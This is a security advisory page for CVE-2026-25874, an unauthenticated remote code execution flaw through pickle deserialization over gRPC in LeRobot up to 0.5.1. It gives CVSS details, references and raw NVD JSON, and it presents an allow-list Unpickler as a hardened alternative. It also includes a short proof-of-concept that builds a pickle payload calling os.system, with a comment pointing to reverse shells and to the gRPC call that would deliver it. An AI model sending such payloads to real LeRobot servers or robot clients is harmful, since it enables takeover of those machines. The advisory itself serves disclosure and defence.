Security Vulnerability Report
CVE-2026-25874 CVSS 9.8 CRITICAL

CVE-2026-25874

Published: 2026-04-23 20:16:14
Last Modified: 2026-04-28 19:01:40

Description

LeRobot through 0.5.1 contains an unsafe deserialization vulnerability in the async inference pipeline where pickle.loads() is used to deserialize data received over unauthenticated gRPC channels without TLS in the policy server and robot client components. An unauthenticated network-reachable attacker can achieve arbitrary code execution on the server or client by sending a crafted pickle payload through the SendPolicyInstructions, SendObservations, or GetActions gRPC calls.

CVSS Details

CVSS Score: 9.8
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:huggingface:lerobot:*:*:*:*:*:python:*:* - VULNERABLE
LeRobot <= 0.5.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import pickle
import os


# Define a malicious class to execute code upon deserialization
class ExploitPayload:
    def __reduce__(self):
        # Execute arbitrary command (e.g., create a file or reverse shell)
        return (os.system, ('touch /tmp/pwned',))


# Serialize the malicious object
malicious_data = pickle.dumps(ExploitPayload())

# In a real attack scenario, send this byte stream via gRPC
# Example using a generic gRPC client stub:
# stub.SendPolicyInstructions(request=malicious_data)

print(f"Generated payload length: {len(malicious_data)}")
print("Payload contains arbitrary code execution via pickle.")
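
The same `__reduce__` mechanism run against a hardened deserializer, as an added example (not LeRobot's code and not its actual patch): an allow-list `Unpickler` used in place of `pickle.loads()`. `ALLOWED_GLOBALS`, `safe_loads`, `ConstructedPayload` and the sample messages are assumptions constructed for illustration.

```python
import collections
import io
import pickle

# Assumption: the only non-primitive type a peer may send. Primitives
# (dict, list, str, int, float, bytes) need no entry: they never reach find_class.
ALLOWED_GLOBALS = {("collections", "OrderedDict")}


class AllowListUnpickler(pickle.Unpickler):
    """Unpickler that resolves only allow-listed globals."""

    def find_class(self, module, name):
        # Called for every GLOBAL/STACK_GLOBAL opcode, i.e. before any
        # REDUCE opcode can invoke the resolved callable.
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"blocked global {module}.{name}")


def safe_loads(data: bytes):
    """Replacement for pickle.loads() on bytes received from the network."""
    return AllowListUnpickler(io.BytesIO(data)).load()


class ConstructedPayload:
    """Constructed sample: same __reduce__ shape as the PoC, harmless callable."""

    def __reduce__(self):
        return (print, ("callable ran during deserialization",))


def demo():
    # Constructed messages: one benign observation-like dict, one hostile object.
    benign = pickle.dumps({"joints": [0.1, 0.2],
                           "meta": collections.OrderedDict(step=3)})
    hostile = pickle.dumps(ConstructedPayload())
    results = {"benign": safe_loads(benign)}
    try:
        safe_loads(hostile)
        results["hostile"] = "loaded"
    except pickle.UnpicklingError as exc:
        results["hostile"] = str(exc)
    return results


if __name__ == "__main__":
    print(demo())
```

Allow-listing narrows what a payload can reach but does not authenticate the peer; the unauthenticated, non-TLS gRPC channel named in the description is a separate exposure to close.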

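References

https://chocapikk.com/posts/2026/lerobot-pickle-rce/
https://github.com/huggingface/lerobot/issues/3047
https://github.com/huggingface/lerobot/issues/3134
https://github.com/huggingface/lerobot/pull/3048
https://www.vulncheck.com/advisories/lerobot-unsafe-deserialization-remote-code-execution-via-grpc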

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-25874", "sourceIdentifier": "[email protected]", "published": "2026-04-23T20:16:13.903", "lastModified": "2026-04-28T19:01:40.377", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "LeRobot through 0.5.1 contains an unsafe deserialization vulnerability in the async inference pipeline where pickle.loads() is used to deserialize data received over unauthenticated gRPC channels without TLS in the policy server and robot client components. An unauthenticated network-reachable attacker can achieve arbitrary code execution on the server or client by sending a crafted pickle payload through the SendPolicyInstructions, SendObservations, or GetActions gRPC calls."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", 
"modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-502"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:huggingface:lerobot:*:*:*:*:*:python:*:*", "versionEndIncluding": "0.5.1", "matchCriteriaId": "C91BE4D0-80D2-4E4D-810A-DF1A949D789E"}]}]}], "references": [{"url": "https://chocapikk.com/posts/2026/lerobot-pickle-rce/", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Third Party Advisory"]}, {"url": "https://github.com/huggingface/lerobot/issues/3047", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://github.com/huggingface/lerobot/issues/3134", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://github.com/huggingface/lerobot/pull/3048", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://www.vulncheck.com/advisories/lerobot-unsafe-deserialization-remote-code-execution-via-grpc", "source": "[email protected]", "tags": ["Third Party Advisory", "Exploit"]}]}}